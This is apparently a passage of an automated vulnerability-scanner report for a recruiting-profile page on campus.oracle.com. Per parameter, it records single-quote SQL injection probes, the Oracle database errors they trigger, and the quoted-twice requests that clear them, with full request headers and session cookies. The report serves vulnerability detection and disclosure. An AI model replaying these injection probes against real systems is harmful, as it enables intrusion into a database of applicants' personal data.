GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors'&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:31 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors''&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:32 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com'&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:13 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2738
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-01756: quoted string not properly terminated<br>    at oracle.jdbc.drive
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com''&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:13 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.5. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [fname1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The fname1 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fname1 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss'&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:44:45 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss''&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:44:45 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.6. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [gdate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The gdate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gdate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012'&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:25 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2899
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012''&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:25 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.7. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [lname1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The lname1 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lname1 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss'&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:44:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss''&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:44:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

